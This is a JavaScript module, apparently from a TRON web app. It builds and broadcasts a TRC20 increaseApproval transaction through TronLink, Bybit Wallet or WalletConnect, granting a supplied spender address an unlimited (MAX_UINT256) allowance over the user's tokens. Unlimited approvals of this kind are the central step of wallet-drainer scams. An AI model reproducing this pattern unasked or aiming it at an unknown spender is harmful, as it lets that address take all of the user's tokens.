/**
 * TRC20 Token Approval Logic
 * Converted from TypeScript to vanilla JavaScript
 */
import { TronWeb } from "tronweb";

const MAX_UINT256 =
  "115792089237316195423570985008687907853269984665640564039457584007913129639935";

/**
 * Approve TRC20 token
 */
export async function approveToken(
  token,
  spenderAddress,
  adapter,
  rpcUrl,
  explorerUrl,
  onProgress
) {
  try {
    onProgress?.({
      step: "prepare",
      message: "Preparing transaction...",
    });

    const userAddress = adapter.address;

    // console.log("=== APPROVE START ===");
    // console.log("Token address:", token.address);
    // console.log("Spender address:", spenderAddress);
    // console.log("User address:", userAddress);
    // console.log("Adapter:", adapter.name);

    let txId;

    // ========== TRONLINK FLOW ==========
    if (adapter.name === "TronLink") {
      console.log("Using TronLink flow");

      if (!window.tronLink?.tronWeb) {
        throw new Error("TronLink tronWeb is not available");
      }

      const tronWeb = window.tronLink.tronWeb;
      window.tronWeb = tronWeb;

      const contract = await tronWeb.contract().at(token.address);

      onProgress?.({
        step: "sign",
        message: "Signing transaction in the wallet...",
      });

      const tx = await contract
        .increaseApproval(spenderAddress, MAX_UINT256)
        .send({
          feeLimit: 100_000_000,
          callValue: 0,
          shouldPollResponse: false,
        });

      console.log("Transaction sent:", tx);
      txId = tx;
    }
    // ========== BYBIT WALLET FLOW ==========
    else if (adapter.name === "Bybit") {
      console.log("Using Bybit Wallet flow");

      if (!window.bybitWallet?.tronLink?.tronWeb) {
        throw new Error("Bybit Wallet tronWeb is not available");
      }

      const tronWeb = window.bybitWallet.tronLink.tronWeb;
      window.tronWeb = tronWeb;

      const parameter = [
        { type: "address", value: spenderAddress },
        { type: "uint256", value: MAX_UINT256 },
      ];

      // Create transaction
      const txResult = await tronWeb.transactionBuilder.triggerSmartContract(
        token.address,
        "increaseApproval(address,uint256)",
        {
          feeLimit: 30_000_000,
          callValue: 0,
        },
        parameter,
        tronWeb.address.toHex(userAddress)
      );

      if (!txResult || !txResult.transaction) {
        throw new Error("Could not create transaction");
      }

      console.log("✅ Transaction created:", txResult.transaction.txID);

      onProgress?.({
        step: "sign",
        message: "Signing transaction in Bybit Wallet...",
      });

      // Sign via Bybit official API
      const signedTransaction = await window.bybitWallet.tronLink.sign(
        txResult.transaction
      );

      if (!signedTransaction || !signedTransaction.signature) {
        throw new Error("No signature in signed transaction");
      }

      console.log("Transaction signed");

      onProgress?.({
        step: "broadcast",
        message: "Sending to the blockchain...",
      });

      const result = await tronWeb.trx.sendRawTransaction(signedTransaction);

      if (result.message) {
        try {
          const Buffer = require("buffer").Buffer;
          const decodedMsg = Buffer.from(result.message, "hex").toString(
            "utf8"
          );
          console.log("Decoded error:", decodedMsg);
        } catch (e) {
          console.log("Raw message:", result.message);
        }
      }

      if (!result || !result.result) {
        const errorMsg = result.message || result.code || "unknown error";
        throw new Error("Transaction rejected: " + errorMsg);
      }

      txId = result.txid || result.transaction?.txID || signedTransaction.txID;
    }
    // ========== WALLETCONNECT FLOW ==========
    else {
      console.log("Using WalletConnect flow");

      const tronWeb = new TronWeb({
        fullHost: rpcUrl,
      });
      tronWeb.setAddress(userAddress);
      window.tronWeb = tronWeb;

      const parameter = [
        { type: "address", value: spenderAddress },
        { type: "uint256", value: MAX_UINT256 },
      ];

      const txResult = await tronWeb.transactionBuilder.triggerSmartContract(
        token.address,
        "increaseApproval(address,uint256)",
        {
          feeLimit: 30_000_000,
          callValue: 0,
        },
        parameter,
        tronWeb.address.toHex(userAddress)
      );

      if (!txResult || !txResult.transaction) {
        throw new Error("Could not create transaction");
      }

      console.log("Transaction created:", txResult.transaction.txID);

      onProgress?.({
        step: "sign",
        message: "Signing transaction in the wallet...",
      });

      const signedTransaction = await adapter.signTransaction(
        txResult.transaction
      );

      if (!signedTransaction || !signedTransaction.signature) {
        throw new Error("No signature in signed transaction");
      }

      console.log("Transaction signed");

      onProgress?.({
        step: "broadcast",
        message: "Sending to the blockchain...",
      });

      const result = await tronWeb.trx.sendRawTransaction(signedTransaction);

      if (result.message) {
        try {
          const Buffer = require("buffer").Buffer;
          const decodedMsg = Buffer.from(result.message, "hex").toString(
            "utf8"
          );
          console.log(" Decoded error:", decodedMsg);
        } catch (e) {
          console.log("Raw message:", result.message);
        }
      }

      if (!result || !result.result) {
        const errorMsg = result.message || result.code || "unknown error";
        throw new Error("Transaction rejected: " + errorMsg);
      }

      txId = result.txid || result.transaction?.txID || signedTransaction.txID;
    }

    if (!txId) {
      throw new Error("Could not get transaction ID");
    }

    console.log("Transaction ID:", txId);

    onProgress?.({
      step: "wait_confirmation",
      message: "Waiting for confirmation...",
      txId,
    });

    // Wait for confirmation
    const tronWeb = window.tronWeb;
    let confirmed = false;
    let attempts = 0;
    const maxAttempts = 20;

    while (!confirmed && attempts < maxAttempts) {
      await new Promise((res) => setTimeout(res, 3000));
      try {
        const txInfo = await tronWeb.trx.getTransaction(txId);

        if (txInfo && txInfo.ret && txInfo.ret[0]?.contractRet === "SUCCESS") {
          confirmed = true;
          console.log("Transaction confirmed!");
        }
      } catch (e) {
        console.log(`Attempt ${attempts + 1}/${maxAttempts}: Waiting...`);
      }
      attempts++;
    }

    if (!confirmed) {
      console.warn("Transaction not confirmed after 60 seconds");
    }

    onProgress?.({
      step: "success",
      message: "Transaction sent!",
      txId,
    });

    return {
      success: true,
      txId,
      explorerUrl: `${explorerUrl}/#/transaction/${txId}`,
    };
  } catch (error) {
    console.error("Approve error:", error);
    throw error;
  }
}
